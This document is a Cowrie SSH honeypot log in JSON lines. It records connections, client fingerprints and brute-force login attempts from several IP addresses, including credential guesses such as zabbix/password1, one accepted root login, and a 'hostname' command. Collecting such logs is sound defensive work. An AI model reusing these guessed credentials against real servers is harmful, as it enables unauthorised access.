{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:17:46.640713Z","src_ip":"212.227.235.229","session":"1dd3d0007112"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"password1","message":"login attempt [zabbix/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T07:17:52.144739Z","src_ip":"212.227.235.229","session":"1dd3d0007112"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:17:53.958023Z","src_ip":"212.227.235.229","session":"1dd3d0007112"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"11.3","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 11.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:17:57.570817Z","src_ip":"212.227.235.229","session":"0043267c3590"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":50688,"dst_ip":"1.2.3.4","dst_port":22,"session":"3efd934c83bb","protocol":"ssh","message":"New connection: 102.210.148.92:50688 (1.2.3.4:22) [session: 3efd934c83bb]","sensor":"my-vps","timestamp":"2025-08-31T07:18:00.091620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:18:00.092344Z","src_ip":"102.210.148.92","session":"3efd934c83bb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:18:00.273342Z","src_ip":"102.210.148.92","session":"3efd934c83bb"}
{"eventid":"cowrie.login.failed","username":"dell","password":"q1w2e3","message":"login attempt [dell/q1w2e3] failed","sensor":"my-vps","timestamp":"2025-08-31T07:18:01.035354Z","src_ip":"102.210.148.92","session":"3efd934c83bb"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:18:02.218142Z","src_ip":"102.210.148.92","session":"3efd934c83bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49732,"dst_ip":"1.2.3.4","dst_port":22,"session":"056637a815b5","protocol":"ssh","message":"New connection: 212.227.125.160:49732 (1.2.3.4:22) [session: 056637a815b5]","sensor":"my-vps","timestamp":"2025-08-31T07:18:07.119226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:18:07.603108Z","src_ip":"212.227.125.160","session":"056637a815b5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:18:07.645570Z","src_ip":"212.227.125.160","session":"056637a815b5"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"password1","message":"login attempt [zabbix/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T07:18:10.828061Z","src_ip":"212.227.125.160","session":"056637a815b5"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:18:12.436105Z","src_ip":"212.227.125.160","session":"056637a815b5"}
{"eventid":"cowrie.session.closed","duration":"115.3","message":"Connection lost after 115.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:18:12.458314Z","src_ip":"212.227.235.229","session":"0043267c3590"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37912,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8cf7776a5d9","protocol":"ssh","message":"New connection: 212.227.235.229:37912 (1.2.3.4:22) [session: a8cf7776a5d9]","sensor":"my-vps","timestamp":"2025-08-31T07:18:45.743322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:18:46.484758Z","src_ip":"212.227.235.229","session":"a8cf7776a5d9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:18:46.485478Z","src_ip":"212.227.235.229","session":"a8cf7776a5d9"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"admin123","message":"login attempt [zabbix/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:18:52.578926Z","src_ip":"212.227.235.229","session":"a8cf7776a5d9"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:18:54.391976Z","src_ip":"212.227.235.229","session":"a8cf7776a5d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55728,"dst_ip":"1.2.3.4","dst_port":22,"session":"410cc32d91f8","protocol":"ssh","message":"New connection: 212.227.125.160:55728 (1.2.3.4:22) [session: 410cc32d91f8]","sensor":"my-vps","timestamp":"2025-08-31T07:19:06.989778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:19:07.572401Z","src_ip":"212.227.125.160","session":"410cc32d91f8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:19:07.573419Z","src_ip":"212.227.125.160","session":"410cc32d91f8"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"admin123","message":"login attempt [zabbix/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:19:10.089958Z","src_ip":"212.227.125.160","session":"410cc32d91f8"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:19:11.881220Z","src_ip":"212.227.125.160","session":"410cc32d91f8"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":39862,"dst_ip":"1.2.3.4","dst_port":22,"session":"884558c28085","protocol":"ssh","message":"New connection: 102.210.148.92:39862 (1.2.3.4:22) [session: 884558c28085]","sensor":"my-vps","timestamp":"2025-08-31T07:19:14.481558Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:19:14.482941Z","src_ip":"102.210.148.92","session":"884558c28085"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:19:14.661972Z","src_ip":"102.210.148.92","session":"884558c28085"}
{"eventid":"cowrie.login.failed","username":"user","password":"passw0rd!","message":"login attempt [user/passw0rd!] failed","sensor":"my-vps","timestamp":"2025-08-31T07:19:15.418123Z","src_ip":"102.210.148.92","session":"884558c28085"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:19:16.599505Z","src_ip":"102.210.148.92","session":"884558c28085"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41104,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5ca8427d454","protocol":"ssh","message":"New connection: 212.227.125.160:41104 (1.2.3.4:22) [session: e5ca8427d454]","sensor":"my-vps","timestamp":"2025-08-31T07:19:30.165327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:19:30.946481Z","src_ip":"212.227.125.160","session":"e5ca8427d454"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:19:30.947180Z","src_ip":"212.227.125.160","session":"e5ca8427d454"}
{"eventid":"cowrie.login.success","username":"root","password":"capitaltruck2021","message":"login attempt [root/capitaltruck2021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:19:35.324244Z","src_ip":"212.227.125.160","session":"e5ca8427d454"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:19:38.216240Z","src_ip":"212.227.125.160","session":"e5ca8427d454"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T07:19:38.216928Z","src_ip":"212.227.125.160","session":"e5ca8427d454"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:19:39.324511Z","src_ip":"212.227.125.160","session":"e5ca8427d454"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:19:39.325932Z","src_ip":"212.227.125.160","session":"e5ca8427d454"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42027,"dst_ip":"1.2.3.4","dst_port":22,"session":"36b3283d8fbe","protocol":"ssh","message":"New connection: 212.227.235.229:42027 (1.2.3.4:22) [session: 36b3283d8fbe]","sensor":"my-vps","timestamp":"2025-08-31T07:19:42.093283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:19:42.110330Z","src_ip":"212.227.235.229","session":"36b3283d8fbe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:19:42.941040Z","src_ip":"212.227.235.229","session":"36b3283d8fbe"}
{"eventid":"cowrie.login.failed","username":"alba","password":"alba","message":"login attempt [alba/alba] failed","sensor":"my-vps","timestamp":"2025-08-31T07:19:43.632598Z","src_ip":"212.227.235.229","session":"36b3283d8fbe"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:19:44.818828Z","src_ip":"212.227.235.229","session":"36b3283d8fbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43572,"dst_ip":"1.2.3.4","dst_port":22,"session":"139481cce198","protocol":"ssh","message":"New connection: 212.227.235.229:43572 (1.2.3.4:22) [session: 139481cce198]","sensor":"my-vps","timestamp":"2025-08-31T07:19:45.504366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:19:46.258722Z","src_ip":"212.227.235.229","session":"139481cce198"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:19:46.260136Z","src_ip":"212.227.235.229","session":"139481cce198"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":40986,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfa58e7b145b","protocol":"ssh","message":"New connection: 201.148.180.50:40986 (1.2.3.4:22) [session: dfa58e7b145b]","sensor":"my-vps","timestamp":"2025-08-31T07:19:47.606855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:19:48.072220Z","src_ip":"201.148.180.50","session":"dfa58e7b145b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:19:48.073791Z","src_ip":"201.148.180.50","session":"dfa58e7b145b"}
